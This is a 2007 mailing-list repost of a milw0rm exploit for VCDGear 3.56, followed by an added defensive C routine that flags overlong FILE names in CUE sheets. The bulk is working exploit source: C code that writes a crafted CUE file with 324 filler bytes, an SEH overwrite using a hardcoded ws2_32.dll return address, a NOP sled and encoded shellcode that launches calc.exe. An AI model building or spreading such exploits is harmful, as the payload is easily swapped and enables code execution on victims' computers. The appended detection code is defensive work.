Re: VCDGear <= 3.56 Build 050213 (FILE) Local Code Execution Exploit

From: str0ke (str0kemilw0rm.com)
Date: Sat Apr 14 2007 - 12:09:36 CDT


Original author: InTeL

http://www.milw0rm.com/exploits/3727

/str0ke

On 14 Apr 2007 11:49:22 -0000, meftunmeftunnet.com
<meftunmeftunnet.com> wrote:
> /* ~~~~~~~~~~~~~~0day~~~~~~~~~~~~~~~~~~
> Discovered by: C-W-M
> Author: C-W-M ~ Www.MeftunNet.Com & Www.HackerSecurity.Org
> Location : Turkey...
> Attack Vector: SEH overwrite
> Type: Local
> Tested on Win2k SP4 (English)
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> Software: VCDGear v3.56 build 050213
> Website: www.vcdgear.com
> Description:
>
> "VCDGear is a program designed to allow a user to extract MPEG streams from CD images, convert VCD files to MPEG,
> correct MPEG errors, and more -- all in a single step. Initially developed back in late 1997, the program has
> grown to do various extractions, conversions, and corrections on the fly. Cross-platform support will allow
> different machines to process and generate output that is compatible between one another."
>
> Total Buf Size: 2512 - [Junk - 324][SEH overwrite - 8][NOP Sled and Shellcode room for - 2180]
>
> Greetz: Ekobar, Poizonb0X, eno7, Doublekickx #pen15
> */
>
> #include <stdlib.h>
> #include <stdio.h>
>
> // Exec Calc.exe Scode
> unsigned char scode[] =
> "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
> "\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
> "\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
> "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
> "\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
> "\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
> "\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
> "\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
> "\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
> "\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
> "\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
> "\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
> "\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
> "\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
> "\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
> "\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
> "\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
> "\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
> "\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
> "\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
> "\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";
>
>
> int main(int argc, char *argv[])
> {
> FILE *handle;
>
> if(argc < 2) {
> printf("0day VCDGear exploit\n");
> printf("Usage: %s <output CUE file>", argv[0]);
> return 0;
> }
>
> if(!(handle = fopen(argv[1], "w"))) {
> printf("[+] Error");
> return 0;
> }
>
> fputs("FILE \"", handle);
> for (int i=0;i<324;i++) \
> fputs("A", handle);
>
> fputs("\xeb\x32\x90\x90", handle);
> fputs("\x3a\x1f\x03\x75", handle); //pop edi, pop esi, retn in ws2_32.dll (English / 5.0.2195.6601)
> for (i=0;i<200;i++)
> fputs("\x90", handle);
>
> fputs((char *)scode, handle);
> fputs("\" BINARY\n", handle);
> fputs(" TRACK 01 MODE2/2352\n", handle);
> fputs(" INDEX 01 00:00:00\n", handle);
>
> fclose(handle);
>
> printf("[+] File successfully created");
>
> return 0;
> }
>
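As an added example (not part of the original post and not VCDGear code): a check that a file-handling tool or mail gateway could run on a CUE sheet before it reaches a parser, flagging the overlong quoted FILE name this message relies on. The 260-byte limit, the flag names and the function names are assumptions, and only the quoted uppercase `FILE "..."` form is handled.

```c
#include <stdio.h>
#include <string.h>

/* Assumed policy: names longer than Windows MAX_PATH are rejected. */
#define CUE_MAX_NAME 260u
#define CUE_LONG         1u  /* quoted name exceeds CUE_MAX_NAME */
#define CUE_CTRL         2u  /* control byte inside the quoted name */
#define CUE_UNTERMINATED 4u  /* no closing quote on the line */

/* Check one line (no trailing '\n'); anything but FILE "..." yields 0. */
unsigned cue_check_line(const unsigned char *p, size_t n)
{
    unsigned flags = 0;
    size_t i = 0, start;

    while (i < n && (p[i] == ' ' || p[i] == '\t'))
        i++;
    if (n - i < 6 || memcmp(p + i, "FILE \"", 6) != 0)
        return 0;
    start = i + 6;
    for (i = start; i < n && p[i] != '"'; i++)
        if (p[i] < 0x20 || p[i] == 0x7f)
            flags |= CUE_CTRL;
    if (i == n)
        flags |= CUE_UNTERMINATED;
    if (i - start > CUE_MAX_NAME)
        flags |= CUE_LONG;
    return flags;
}

/* Scan a whole CUE sheet held in memory; returns the OR of all line flags. */
unsigned cue_scan(const unsigned char *buf, size_t len)
{
    unsigned flags = 0;
    size_t pos = 0;

    while (pos < len) {
        const unsigned char *nl = memchr(buf + pos, '\n', len - pos);
        size_t linelen = nl ? (size_t)(nl - (buf + pos)) : len - pos;
        flags |= cue_check_line(buf + pos, linelen);
        pos += linelen + 1;
    }
    return flags;
}

int main(void)
{
    /* Constructed sample: a well-formed sheet. */
    const char ok[] = "FILE \"disc.bin\" BINARY\n  TRACK 01 MODE2/2352\n";
    printf("flags=%u\n", cue_scan((const unsigned char *)ok, sizeof ok - 1));
    return 0;
}
```

A non-zero result means the sheet should be quarantined rather than opened; the length flag alone already fires on a name with the 324 filler bytes described in the message.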